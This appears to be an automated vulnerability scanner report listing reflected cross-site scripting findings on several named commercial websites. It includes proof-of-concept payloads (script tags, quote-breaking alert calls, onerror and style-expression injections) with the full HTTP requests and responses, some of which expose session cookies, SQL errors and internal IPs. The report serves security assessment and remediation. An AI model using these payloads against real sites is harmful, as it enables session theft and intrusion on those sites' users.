Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Issue remediation
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
The value of the q request parameter is copied into the HTML document as plain text between tags. The payload a6c4b<script>alert(1)</script>e9fbb5130ab was submitted in the q parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the qry_lnk request parameter is copied into the HTML document as plain text between tags. The payload 7c385<script>alert(1)</script>7b7cdbc378 was submitted in the qry_lnk parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the frameName request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 69616'-alert(1)-'9309e177aaf was submitted in the frameName parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /AdServer/AdServerServlet?operId=2&pubId=28489&siteId=28535&adId=24101&kadwidth=300&kadheight=250&kadNetwork=559&kbgColor=ffffff&ktextColor=000000&klinkColor=0000EE&pageURL=http://ads.pubmatic.com/HostedDefaultTags/28489/28535/24101/559/adtag.html&frameName=http_ads_pubmatic_comHostedDefaultTags284892853524101559adtag_htmlkomli_ads_frame1284892853569616'-alert(1)-'9309e177aaf&kltstamp=2011-9-18%2020%3A25%3A35&ranreq=0.34278702503070235&timezone=-5&screenResolution=1920x1200&inIframe=1&adPosition=-1x-1&adVisibility=0 HTTP/1.1 Host: showadsak.pubmatic.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.51.22 (KHTML, like Gecko) Version/5.1.1 Safari/534.51.22 Accept: */* Referer: http://ads.pubmatic.com/HostedDefaultTags/28489/28535/24101/559/adtag.html Accept-Language: en-US Accept-Encoding: gzip, deflate Connection: keep-alive Proxy-Connection: keep-alive
Response
HTTP/1.1 200 OK Server: Apache/2.2.4 (Unix) DAV/2 mod_ssl/2.2.4 OpenSSL/0.9.7a mod_fastcgi/2.4.2 Vary: Accept-Encoding P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC" Cache-Control: no-store, no-cache, private Pragma: no-cache Content-Type: text/html Content-Length: 1716 Date: Wed, 19 Oct 2011 01:25:18 GMT Connection: close Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Thu, 18-Oct-2012 01:25:18 GMT; path=/ Set-Cookie: pubfreq_28535_24101_1164556507=325-1; domain=pubmatic.com; expires=Wed, 19-Oct-2011 02:05:18 GMT; path=/
The value of the pageURL request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 71a74'-alert(1)-'95e5c0fb09c was submitted in the pageURL parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /AdServer/AdServerServlet?operId=2&pubId=28489&siteId=28535&adId=24101&kadwidth=300&kadheight=250&kadNetwork=559&kbgColor=ffffff&ktextColor=000000&klinkColor=0000EE&pageURL=http://ads.pubmatic.com/HostedDefaultTags/28489/28535/24101/559/adtag.html71a74'-alert(1)-'95e5c0fb09c&frameName=http_ads_pubmatic_comHostedDefaultTags284892853524101559adtag_htmlkomli_ads_frame12848928535&kltstamp=2011-9-18%2020%3A25%3A35&ranreq=0.34278702503070235&timezone=-5&screenResolution=1920x1200&inIframe=1&adPosition=-1x-1&adVisibility=0 HTTP/1.1 Host: showadsak.pubmatic.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.51.22 (KHTML, like Gecko) Version/5.1.1 Safari/534.51.22 Accept: */* Referer: http://ads.pubmatic.com/HostedDefaultTags/28489/28535/24101/559/adtag.html Accept-Language: en-US Accept-Encoding: gzip, deflate Connection: keep-alive Proxy-Connection: keep-alive
Response
HTTP/1.1 200 OK Server: Apache/2.2.4 (Unix) DAV/2 mod_ssl/2.2.4 OpenSSL/0.9.7a mod_fastcgi/2.4.2 Vary: Accept-Encoding P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC" Cache-Control: no-store, no-cache, private Pragma: no-cache Content-Type: text/html Content-Length: 1716 Date: Wed, 19 Oct 2011 01:25:16 GMT Connection: close Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Thu, 18-Oct-2012 01:25:16 GMT; path=/ Set-Cookie: pubfreq_28535_24101_927002863=325-1; domain=pubmatic.com; expires=Wed, 19-Oct-2011 02:05:16 GMT; path=/
The value of the pmZoneId request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a8e2a'-alert(1)-'fe4cda61f05 was submitted in the pmZoneId parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /AdServer/AdServerServlet?operId=2&pubId=28489&siteId=28535&adId=24103&kadwidth=728&kadheight=90&pmZoneId=azfamily.com_728x90a8e2a'-alert(1)-'fe4cda61f05&kbgColor=ffffff&ktextColor=000000&klinkColor=002E64&pageURL=http://www.king5.com/&frameName=http_www_king5_comkomli_ads_frame12848928535&kltstamp=2011-9-18%2020%3A24%3A51&ranreq=0.4976927924435586&timezone=-5&screenResolution=1920x1200&inIframe=0&adPosition=0x1062&adVisibility=3 HTTP/1.1 Host: showadsak.pubmatic.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.51.22 (KHTML, like Gecko) Version/5.1.1 Safari/534.51.22 Accept: */* Referer: http://www.king5.com/ Accept-Language: en-US Accept-Encoding: gzip, deflate Connection: keep-alive Proxy-Connection: keep-alive
Response
HTTP/1.1 200 OK Server: Apache/2.2.4 (Unix) DAV/2 mod_ssl/2.2.4 OpenSSL/0.9.7a mod_fastcgi/2.4.2 Vary: Accept-Encoding P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC" Cache-Control: no-store, no-cache, private Pragma: no-cache Content-Type: text/html Date: Wed, 19 Oct 2011 01:24:50 GMT Content-Length: 1904 Connection: close Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Thu, 18-Oct-2012 01:24:50 GMT; path=/ Set-Cookie: pubfreq_28535_24103_85091502=6-1; domain=pubmatic.com; expires=Wed, 19-Oct-2011 02:04:50 GMT; path=/ Set-Cookie: PMDTSHR=cat:; domain=pubmatic.com; expires=Thu, 20-Oct-2011 01:24:50 GMT; path=/
The value of the ranreq request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 87ae9'-alert(1)-'8adf6ed829a was submitted in the ranreq parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /AdServer/AdServerServlet?operId=2&pubId=28489&siteId=28535&adId=24101&kadwidth=300&kadheight=250&kadNetwork=559&kbgColor=ffffff&ktextColor=000000&klinkColor=0000EE&pageURL=http://ads.pubmatic.com/HostedDefaultTags/28489/28535/24101/559/adtag.html&frameName=http_ads_pubmatic_comHostedDefaultTags284892853524101559adtag_htmlkomli_ads_frame12848928535&kltstamp=2011-9-18%2020%3A25%3A35&ranreq=0.3427870250307023587ae9'-alert(1)-'8adf6ed829a&timezone=-5&screenResolution=1920x1200&inIframe=1&adPosition=-1x-1&adVisibility=0 HTTP/1.1 Host: showadsak.pubmatic.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.51.22 (KHTML, like Gecko) Version/5.1.1 Safari/534.51.22 Accept: */* Referer: http://ads.pubmatic.com/HostedDefaultTags/28489/28535/24101/559/adtag.html Accept-Language: en-US Accept-Encoding: gzip, deflate Connection: keep-alive Proxy-Connection: keep-alive
Response
HTTP/1.1 200 OK Server: Apache/2.2.4 (Unix) DAV/2 mod_ssl/2.2.4 OpenSSL/0.9.7a mod_fastcgi/2.4.2 Vary: Accept-Encoding P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC" Cache-Control: no-store, no-cache, private Pragma: no-cache Content-Type: text/html Date: Wed, 19 Oct 2011 01:25:22 GMT Content-Length: 1716 Connection: close Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Thu, 18-Oct-2012 01:25:21 GMT; path=/ Set-Cookie: pubfreq_28535_24101_1653497370=325-1; domain=pubmatic.com; expires=Wed, 19-Oct-2011 02:05:22 GMT; path=/
The value of the type request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ca0cb"%3balert(1)//f7b7c0acb35 was submitted in the type parameter. This input was echoed as ca0cb";alert(1)//f7b7c0acb35 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 103788 Content-Type: text/html; Charset=UTF-8 P3P: CP="NOI LAW NID BUS CUSo PSAo PSDo TAIo OUR OTR COM DEM NAV PRE" X-Powered-By: ASP.NET Set-Cookie: tg_session_13746_195=; path=/; HttpOnly; Secure Set-Cookie: tg_session=; path=/; HttpOnly; Secure Set-Cookie: tg_session=^gemIFr0yz7Qk/HHmw74gmOHV4TH40VUWJZ/I3JlzEXeKVJGuRHbUCluD9BZg199tJ3OFxCKuO2Wf_C_R__L_F_mJO3FjLZoojSUEFO1YHbsP9BRGh0yXk=; path=/; HttpOnly; Secure Set-Cookie: tg_session_13746_195=^gemIFr0yz7Qk/HHmw74gmOHV4TH40VUWJZ/I3JlzEXeKVJGuRHbUCluD9BZg199tJ3OFxCKuO2Wf_C_R__L_F_mJO3FjLZoojSUEFO1YHbsP9BRGh0yXk=; path=/; HttpOnly; Secure Date: Fri, 14 Oct 2011 19:35:01 GMT
<SCRIPT LANGUAGE="javascript"> var MSG_DifferentLocaleSubmission= "You have selected jobs in different languages. Please limit your selection to one language at a time. \n\rAfter submitting, you ...[SNIP]... if (strLocale == lngSiteLocale) { openWindow11("/" + strLocale + "/asp/tg/GQLogin.asp?SID=^gemIFr0yz7Qk/HHmw74gmJV/30EMcKDpIpVG4JKSMUjokRpIU4jVBEjzlRm_slp_rhc_xgpw&fjd=true&referer=searchca0cb";alert(1)//f7b7c0acb35&gqid="+ arrGQIds[2] + "&jobinfo=__" + arrGQId[lngSelect-1] + "__&applycount=1&type=searchca0cb";alert(1)//f7b7c0acb35_jobdetail"); } else { document.frmMassApply.GQID.value = a ...[SNIP]...
The value of the type request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 65e96"style%3d"x%3aexpression(alert(1))"896f6a37999 was submitted in the type parameter. This input was echoed as 65e96"style="x:expression(alert(1))"896f6a37999 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 103954 Content-Type: text/html; Charset=UTF-8 P3P: CP="NOI LAW NID BUS CUSo PSAo PSDo TAIo OUR OTR COM DEM NAV PRE" X-Powered-By: ASP.NET Set-Cookie: tg_session_13746_195=; path=/; HttpOnly; Secure Set-Cookie: tg_session=; path=/; HttpOnly; Secure Set-Cookie: tg_session=^XAu7YJSy6wM15vti2Dcw/5igd0a1kbW2X1V72L2DqV6yY/1tGUDlWN/giRJyirf2cgxc6U5wJwlk_C_R__L_F_nZAUUZS5NumjSjPgpez1WPPVaNvztpA=; path=/; HttpOnly; Secure Set-Cookie: tg_session_13746_195=^XAu7YJSy6wM15vti2Dcw/5igd0a1kbW2X1V72L2DqV6yY/1tGUDlWN/giRJyirf2cgxc6U5wJwlk_C_R__L_F_nZAUUZS5NumjSjPgpez1WPPVaNvztpA=; path=/; HttpOnly; Secure Date: Fri, 14 Oct 2011 19:34:58 GMT
<SCRIPT LANGUAGE="javascript"> var MSG_DifferentLocaleSubmission= "You have selected jobs in different languages. Please limit your selection to one language at a time. \n\rAfter submitting, you ...[SNIP]... <form name="frmSearch" method="post" action="cim_searchresults.asp?ref=10142011153459&SID=^XAu7YJSy6wM15vti2Dcw/3QuMp84IEWJjuNIvWVftKW2AgflD5sjPb32hqpJWn2j&referer=search65e96"style="x:expression(alert(1))"896f6a37999"> ...[SNIP]...
1.9. http://syndication.mmismm.com/mmtnt.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://syndication.mmismm.com
Path:
/mmtnt.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f722b'%3balert(1)//753de77ed89 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f722b';alert(1)//753de77ed89 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the p request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d8273"%3balert(1)//f5bb147caf8 was submitted in the p parameter. This input was echoed as d8273";alert(1)//f5bb147caf8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, proxy-revalidate Content-Type: text/html Date: Wed, 19 Oct 2011 01:38:03 GMT Expires: Thu, 01 Dec 1994 16:00:00 GMT P3P: policyref="/w3c/p3p.xml", CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Pragma: no-cache Server: TAFE Set-Cookie: tap=jdehhngEWQtABINNk9KlD_3duw0PAAEMAAAABQsAAQAAAAI5OQoAAwAAATMZ0_8xAAsAAQAAAAI3NQoAAwAAATMZ0_8xAAsAAQAAAAI3NAoAAwAAATMZ0_8xAAsAAQAAAAMxMDgKAAMAAAEzGdP_MQALAAEAAAADMTA1CgADAAABMxnT_zEAAA==; expires=Mon, 16-Apr-2012 01:38:03 GMT; Path=/; Domain=.tellapart.com Connection: keep-alive Content-Length: 4627
<html><body> <script type="text/javascript"> // Maximum time allowed for pixels to load. var MAX_PIXEL_LOAD_TIME = 3000; // Ensures no more pixels are loaded after MAX_PIXEL_LOAD_TIME by removing src
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload d4746<script>alert(1)</script>ef5cf2a010e was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 469a8<script>alert(1)</script>f5bea898fa2 was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the zip request parameter is copied into the HTML document as plain text between tags. The payload 17089<img%20src%3da%20onerror%3dalert(1)>487864721b767e161 was submitted in the zip parameter. This input was echoed as 17089<img src=a onerror=alert(1)>487864721b767e161 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
HTTP/1.1 200 OK Date: Wed, 19 Oct 2011 01:43:54 GMT Server: Server Content-Type: text/html;charset=UTF-8 Vary: Accept-Encoding,User-Agent Set-Cookie: ubid-main=181-9895569-2816523; Domain=.amazon.com; Expires=Tue, 14-Oct-2031 01:43:54 GMT; Path=/ Content-Length: 1289
{"phoneBrowseNodeId":"/b/684177011","bundleBuildStates":[{"name":"SELECT_MBB_PLAN","url":"/b/2685640011"}],"didInternalBundleChangeOccur":false,"compatibilityResult":{"isCompatible":false,"compatibilityMessage":"This phone is not available in ZIP Code 1001017089<img src=a onerror=alert(1)>487864721b767e161","compatibilityLink":"<a href=\"/b/684177011/ref=bb_br_ph_dp\"> ...[SNIP]...
The value of the freetext request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f1d07"-alert(1)-"c2642162bae was submitted in the freetext parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the freetext request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1717e"style%3d"x%3aexpression(alert(1))"77ce1a1b412 was submitted in the freetext parameter. This input was echoed as 1717e"style="x:expression(alert(1))"77ce1a1b412 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphpr ...[SNIP]... <meta name="description" content="Shop for lptakefive1717e"style="x:expression(alert(1))"77ce1a1b412 at Diapers.com. Free Shipping. Great Prices. Excellent Service." /> ...[SNIP]...
1.16. http://www.gerberonline.com/category.aspx [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.gerberonline.com
Path:
/category.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 631d5"><script>alert(1)</script>671b8487751 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /category.aspx?catid=171&631d5"><script>alert(1)</script>671b8487751=1 HTTP/1.1 Host: www.gerberonline.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: http://www.google.com/search?gcx=c&sourceid=chrome&ie=UTF-8&q='%22%3C%2Ftitle%3E%3Cscript+src%22+urchin.js'#q='%22%3C/title%3E%3Cscript+src%22+urchin.js'&hl=en&tbo=1&prmd=imvns&source=lnt&tbs=qdr:y&sa=X&ei=V5GYTsLDMsnciALzlP3JDQ&ved=0CA4QpwUoBQ&bav=on.2,or.r_gc.r_pw.,cf.osb&fp=43b88dc4ecfc77e7&biw=1326&bih=890 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Fri, 14 Oct 2011 19:46:57 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Powered-By: UrlRewriter.NET 2.0.0 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 50796
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Cont ...[SNIP]... <a class="currentpage" href="category.aspx?pi=1&catid=171&631d5"><script>alert(1)</script>671b8487751=1"> ...[SNIP]...
The value of the cfg request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 832ae'-alert(1)-'007bad23914 was submitted in the cfg parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the cfg request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 1f937(a)98c961d65a0 was submitted in the cfg parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Cache-Control: public, s-maxage=600 Date: Sat, 15 Oct 2011 17:42:50 GMT Content-Type: text/html; charset=utf-8 Expires: Sat, 15 Oct 2011 17:52:50 GMT Server: Microsoft-IIS/6.0 Server: Scoutweb2 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-HTTPModule: Scout Media Excalibur v.0.0.0.21898 Vary: Accept-Encoding Content-Length: 2414
<!-- ERROR in function: "DB_Template_GET_BySiteAndPageType()" - Local date/time : Saturday, October 15, 2011 10:42:50 AM - Source : .Net SqlClient Data Provider - Message : Incorrect sy ...[SNIP]... <!-- v. 0.0.0.21898 Server Date: Saturday, October 15, 2011 10:42:50 AM URL: http://www.scout.com:80/Legacy/a.z?cfg=response.write(268409241-22)'1f937(a)98c961d65a0&conf=wac&fromprefetch=1&p=24&s=143 Server IP: 192.168.20.94, SCOUTWEB2 Page Execution Time: 5 ms --> ...[SNIP]...
The value of the conf request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 1dbbe(a)18e38db57dd was submitted in the conf parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Cache-Control: public, s-maxage=600 Date: Sat, 15 Oct 2011 17:43:31 GMT Content-Type: text/html; charset=utf-8 Expires: Sat, 15 Oct 2011 17:53:31 GMT Server: Microsoft-IIS/6.0 Server: Sodo X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-HTTPModule: Scout Media Excalibur v.0.0.0.21898 Vary: Accept-Encoding Content-Length: 2456
<!-- ERROR in function: "DB_Template_GET_BySiteAndPageType()" - Local date/time : Saturday, October 15, 2011 10:43:31 AM - Source : .Net SqlClient Data Provider - Message : Unclosed quo ...[SNIP]... <!-- v. 0.0.0.21898 Server Date: Saturday, October 15, 2011 10:43:31 AM URL: http://www.scout.com:80/Legacy/a.z?cfg=response.write(268409241-22)'&conf=wac1dbbe(a)18e38db57dd&fromprefetch=1&p=24&s=143 Server IP: 192.168.20.64, SODO Page Execution Time: 4 ms --> ...[SNIP]...
The value of the conf request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9aff4'-alert(1)-'1f9cfe2dea5 was submitted in the conf parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the fromprefetch request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 13642'-alert(1)-'b9cae18ffb4 was submitted in the fromprefetch parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the fromprefetch request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 8c8f8(a)136ed51efa3 was submitted in the fromprefetch parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Cache-Control: public, s-maxage=600 Date: Sat, 15 Oct 2011 17:44:26 GMT Content-Type: text/html; charset=utf-8 Expires: Sat, 15 Oct 2011 17:54:26 GMT Server: Microsoft-IIS/6.0 Server: Scoutweb1 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-HTTPModule: Scout Media Excalibur v.0.0.0.21898 Vary: Accept-Encoding Content-Length: 2471
<!-- ERROR in function: "DB_Template_GET_BySiteAndPageType()" - Local date/time : Saturday, October 15, 2011 10:44:26 AM - Source : .Net SqlClient Data Provider - Message : Unclosed quo ...[SNIP]... <!-- v. 0.0.0.21898 Server Date: Saturday, October 15, 2011 10:44:26 AM URL: http://www.scout.com:80/Legacy/a.z?cfg=response.write(268409241-22)'&conf=wac&fromprefetch=18c8f8(a)136ed51efa3&p=24&s=143 Server IP: 192.168.20.93, SCOUTWEB1 Page Execution Time: 5 ms --> ...[SNIP]...
1.23. http://www.scout.com/staticpages/www/24/wac/a.z [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.scout.com
Path:
/staticpages/www/24/wac/a.z
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5f1a7'-alert(1)-'a5336cd2117 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Cache-Control: public, s-maxage=600 Date: Sat, 15 Oct 2011 17:50:50 GMT Content-Type: text/html; charset=utf-8 Expires: Sat, 15 Oct 2011 18:00:50 GMT Server: Microsoft-IIS/6.0 Server: Sodo X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-HTTPModule: Scout Media Excalibur v.0.0.0.21898 Vary: Accept-Encoding Content-Length: 2480
<!-- ERROR in function: "DB_Template_GET_BySiteAndPageType()" - Local date/time : Saturday, October 15, 2011 10:50:50 AM - Source : .Net SqlClient Data Provider - Message : Unclosed quo ...[SNIP]... 68409241-22)''. - message : undefined - Number : 105 - Description : undefined - description : undefined - URL: cfg=response.write(268409241-22)'&conf=wac&fromprefetch=1&p=24&s=143&5f1a7'-alert(1)-'a5336cd2117=1 - Remote IP : 50.23.123.106 - Referrer URL : - Server IP: 192.168.20.64, SODO - MachineName: SODO - Stack Trace: at System.Data.SqlClient.SqlConnection.OnError(SqlException e ...[SNIP]...
